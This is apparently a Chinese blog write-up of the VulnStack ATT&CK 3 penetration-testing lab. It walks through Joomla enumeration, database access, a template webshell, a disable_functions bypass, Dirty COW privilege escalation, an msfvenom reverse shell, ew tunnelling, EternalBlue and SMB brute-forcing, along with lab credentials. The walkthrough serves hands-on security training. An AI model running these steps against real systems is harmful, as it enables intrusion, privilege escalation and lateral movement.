
【红日靶场】红队实战三 - PatrickStar88888888
VulnStack-ATT&CK-3(红日靶场三)_红日靶场 3
红日安全红队靶场(三)一次简单的内网渗透
# 环境搭建
# 网卡设置
Kali 机器只和 Web——Centos 同一网段所以 Centos 双网卡,内外网两张,内网 93 , 外网同 Kali 同网段

总算配置好了,从网段不通到网段通了但是少网卡问题真的是接踵而至,这套环境也真是磨人,靶机重启会丢失之前网卡信息就算了还需要重新登录,我哪里给你找密码啊只能忘记密码然后重置,和重新解压导入才可以,比从网卡丢失到 web 明明开启了 80 服务却无法访问,到 ping 不通等等问题都被一一解决,我总结就是先开乌班图配置好仅主机才能通过 Nginx 反代出端口的服务,实际是它提供服务给了 Centos , 再开 Webcentos 配置为桥接和仅仅主机,再重启网卡,这样就可以了
清空之前靶场的 IP 只留下了需要的,之前一直不太了解虚拟机应该如何去配置内外网,其实只要是准备两个 IP 就可以了,入口的出网机器和攻击机 Kali 同一网段所以两种网卡,完全不出网的机器就纯粹的内网 IP 仅主机模式

入口机器 Web-centos 做如下配置其余机器就全部仅主机, IP 会自动分配好或者自定义但是要配置网段为一致的,第一次装入口机器出了问题,所以还是重新安装了一次,外网网卡选择桥接跟 WIFI 一个段 IP 就可以正常获取到,同时 Kali 机器我也是更换为了桥接,方便扫到 web-centos


| 主机 | IP 地址 |
|---|---|
| kali 攻击机 | 172.20.10.3 |
| web-centos | 外网 IP 172.20.10.2 / 内网 IP 192.168.93.100 |
# Kali 扫描
扫描 C 段 发现是可以出现的代表前期设置全部完成
1 | arp-scan-l // 扫描本机网卡172.20.10 网段下存活主机 |

开启 ssh 服务可以尝试靶场 数据库也可以爆破或者远程连接,然后 80 端口就是找 day 打进去
1 | nmap -sV 172.20.10.2 |

# WEB 渗透
访问 80 端口 指纹识别也是一个 CMS 直接找工具就是梭哈,但貌似并没有找到工具能利用

msf 扫描此 cms 版本蛮高的 3.9 没找到什么洞
1 | msf6 auxiliary(scanner/http/joomla_version) > set rhosts 172.20.10.2 |

# 目录扫描
dirmap 这玩意扫是真带劲啊,扫描的非常快就给出关键目录,现在逐个去看有没有关键的信息
1 | python dirmap.py -u http://172.20.10.2/ |

1 | http://172.20.10.2/1.php // phpinfo()页面 |

1 | http://172.20.10.2/index.php/login/ // 用户登录页面 |

# Mysql 连接
爆破 22 端口和 后台管理员都没有尝试。知道可以这样打就可以了,已经远程进数据库下面可以翻账号然后登录进去后台找功能点进去,或者是尝试写 shell 一句话马连
1 | blic $host = 'localhost'; |

连接上找到了 am2Zu_users 表里面的密码是加密的的无法直接使用,思路是利用先前探测到的版本号在官网寻找添加密码的语句,重新添加进去注意语句的字段账号为 admin123 密码为 admin
官网文档

1 | INSERT INTO am2zu_users |
# 后台 Getshell
添加管理员密码后来到后台页面登录进后台,找编辑模板位置添加一句话马
1 | http://172.20.10.2/administrator/index.php |

跟随顺序来到创建文件区域




通过冰鞋马生成,然后复制后直接 Save 保存

1 |
|
上传成功后冰鞋拿这个路径去连接,路径怎么来的我也不知道我也是看文章的,正常要么抓包看要么爆破找,也不费那时间 直接干内网吧
1 | http://172.20.10.2//templates/beez3/1.php |

# Web-Centos 权限
disable_functions 禁用函数了蚁剑没有执行命令的权限。网络上的方式是下载绕过 isable_funtions 的 payload , 然后上传服务器指定目录,通过这个脚本在浏览器上使用 POST 方式执行命令会回显
https://github.com/MrAnonymous-1/disable_functions
1 | POST: cmd=<command> |

我装作不知道找到了账号密码,利用 ssh 连接,等同于拿到了 web-centos 权限
1 | /tmp/mysql/test.txt |

远控软件 FinalShell 连接

执行命令发现双网卡机器
1 | [wwwuser@localhost ~]$ ifconfig |

1 | name -an // 查看内核版本 |
现在对于反向代理没有什么概念,只能看靶机文章求证了,现在 Centos 是基于 ubuntu 机器的 Nginx 服务的, ubuntu 机器关了 Centos 也没有服务
1 | ps aux | grep nginx |
这里的问题是其实我蚁剑得到的其实是第二台靶机 ubuntu , 在下文绕过禁用函数后才发现此问题,在脏牛提权步骤我一度以为从这台机器找到的密码是连接 WebCentos 也就是此后台本身的,那么我拿 SSH 终端连肯定是可以执行提权命令的从而上线,但是提权文件一直找不到,SSH 连的确实是 WebCentos 第一台但是蚁剑却是第二台,如果能早点执行命令或者就能知道,这些还是绕过函数后才知道的
1 | 192.168.93.120 // 第二套ubuntu |

我在蚁剑上传提权文件妄想去 SSH 里面执行两个根本是两台机器根本不会成功,我也是粗心没有想到在 SSH 里面传,但解决了问题就好
1 | 172.20.10.2 // 外网 |

# 脏牛提权
执行命令只是普通用户权限,如果是上传 CS 的马或者 MSF 会无法成功,只能提权内核版本比较老都是使用脏牛提权
EXP
1 | whoami |

# 无法执行提权
自从需要提权开始心都要碎了,我明明用 ssh 连接了但就是找不到提权的执行文件,并且目录下面不知道哪来我没看过的文件,真的是离谱,到处翻文件就是执行不了提权,我可是在 ssh 环境下啊,难道系统环境优先级还没有网站环境高吗,如果 ls 文件存在但执行不了没话讲,文件在远控软件存在在终端就没有了

没办法只能直面 disable_functions 遂到处寻找蚁剑的绕过插件,文章也是模棱两可,我一度以为 Windows 是不能使用插件的,因为哪怕我讲下载到了本地 disable_functions 插件放置到工具对应的插件目录但还是不生效
windows,linux 蚁剑下载与安装 与 手动安装插件 disable_function

OK 心态还好,继续找问题 尝试下载 Linux64 版蚁剑到 Kali 可能是系统导致不能使用插件,谁知道下载都不行,可能网速获取其他问题吧

OK 本地下好拷贝过去总行了吧,找到地址了,直接就是我上早八 这么慢,然后转变思路,开梯子采用在线的形式

连接后插件市场就出来了,真是曲折花了 2 个小时弄好,中途真是大脑紧绷血压一度上升,现在有了绕过插件就可以直接执行文件了吧
插件市场打不开如何解决 (qq.com)
蚁剑插件市场打不开解决方法_蚁剑插件市场加载不出来


# 绕过 disable_functions
生成绕过木马也踩了坑因为发现生成了连不上,原来要更换 Webserver 目录为原先的木马,而后进行生成通过最开始的密码连接
1 | http://172.20.10.2//templates/beez3/.antproxy.php |
蚁剑插件之绕 disable_functions_蚁剑不能执行命令


提权其实不知道怎么好的,文章有些理不清楚一会 mv 复制一会 rm 删除的 但最后还是成功了,让我的 Centos 权限升级为 root 权限 用户是 firefart
1 | gcc -pthread dirty.c -o dirty -lcrypt // 编译提权脚本 |

# MSF 上线 Linux
完全得到 Centos 权限后需要 MSF 展开后渗透环境,搭建路由横向内网
1 | Lhost = 攻击机IP |

创建针对 Linux 的木马后开启监听,反弹 shell 本地做好工作等待受害者主动连接
msf 生成 linux elf 木马反弹 shell
1 | msfconsole |

把木马通过 ssh 上传到第一天机器的目录下,前面通过了脏牛提权有了管理员用户 firefart 但是依旧不能执行此文件,上传后手动改了东西才执行, MSF 上传 exe 得到完整的 Web-Centos root 权限


# 横向移动
获取内网一台主机的权限后,首要目的是得到内网其他存活主机信息,必须先添加路由通讯使我方攻击机可以访问其他机器流量, MSF 工具成功通讯后还需要继续搭建使攻击机所有工具如 nmap 流量都可被访问
我个人理解是针对主机群要做的是存活扫描,确定哪些机器是有效的,整理出 IP 地址 针对单台主机需要做的是扫描开放端口进攻脆弱服务
# MSF 添加路由通讯
1 | route // 打印当前路由 |
其他网段添加路由方式
1
2
3route add 192.168.93.0 255.255.255.0 1
目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 1![]()
1 | /ew for linux64 -s rcsocks -l 1080 -e 1234 |
添加路由后由于 ew 反向代理流量失败,攻击机并没有很好的 ping 通 93 网段只能利用 MSF 扫描模块做接下来渗透
1 | use auxiliary/scanner/smb/smb_version // 使用smb扫描服务 |

机器之前重启过再次开机需要账户密码,只能找文章密码登录开机才能扫到,不然是无法扫到 IP , 有密码后使用套件 psexec 登录其他机器
Windows 2008 本地的管理员用户和域管理员的密码
1 | WIN2008\ Administrator:123qwe!ASD |
1 | WebCentos |
| 主机 | IP 地址 |
|---|---|
| PC | 192.168.93.30 |
| win 2008 | 192.168.93.20 |
| win 2012 (域控) | 192.168.93.10 |

# smb_login 爆破密码
存活机器开放 445 端口可以尝试爆破和测试永恒之蓝,但是永恒之蓝并没有成功只能尝试爆破模块
1 | use exploit/windows/smb/ms17_010_eternalblue |

选择爆破模块爆出账户密码,字典文件是我手动弄了两份在桌上上,因为不知道自带的字典有没有密码存在
1 | use auxiliary/scanner/smb/smb_login |

自带字典在此目录下,无奈做不完了,代理连不上去,工具不能传.Linux 木马生成不了
1 | /usr/share/wordlists/ |

